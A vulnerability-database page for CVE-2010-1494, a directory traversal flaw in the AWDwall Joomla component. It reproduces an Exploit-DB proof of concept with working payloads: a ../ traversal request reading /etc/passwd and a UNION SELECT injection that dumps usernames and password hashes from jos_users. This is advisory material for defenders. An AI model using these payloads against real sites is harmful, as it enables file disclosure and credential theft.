CVE-2010-1494
Description
Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection
=========================================================================================================
[o] Joomla Component AWDwall-Joomla LFI & SQLi [cbuser] Vulnerability
Software : com_awdwall version 1.5.4
Vendor : http://www.awdsolution.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
=========================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_awdwall&controller=[LFI]
http://localhost/[path]/index.php?option=com_awdwall&view=awdwall&Itemid=1&cbuser=1[SQL]
[o] PoC
http://localhost/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
http://localhost/[path]/index.php?option=com_awdwall&view=awdwall&Itemid=1&cbuser=-1+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12+from+jos_users--
=========================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews kaka11 wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
=========================================================================================================
[o] April 08 2010 - GMT +07:00 Jakarta, Indonesia
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| awdsolution | com_awdwall | 1.5.4 | |
| joomla | joomla\! | | |
References
- http://packetstormsecurity.org/1004-exploits/joomlaawdwall-lfisql.txt
- http://secunia.com/advisories/39553
- http://www.awdwall.com/index.php/awdwall-updates-logs-
- http://www.exploit-db.com/exploits/12113
- http://www.osvdb.org/63943
- http://www.securityfocus.com/bid/39331
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57693
- http://packetstormsecurity.org/1004-exploits/joomlaawdwall-lfisql.txt
- http://secunia.com/advisories/39553
- http://www.awdwall.com/index.php/awdwall-updates-logs-
- http://www.exploit-db.com/exploits/12113
- http://www.osvdb.org/63943
- http://www.securityfocus.com/bid/39331
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57693
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.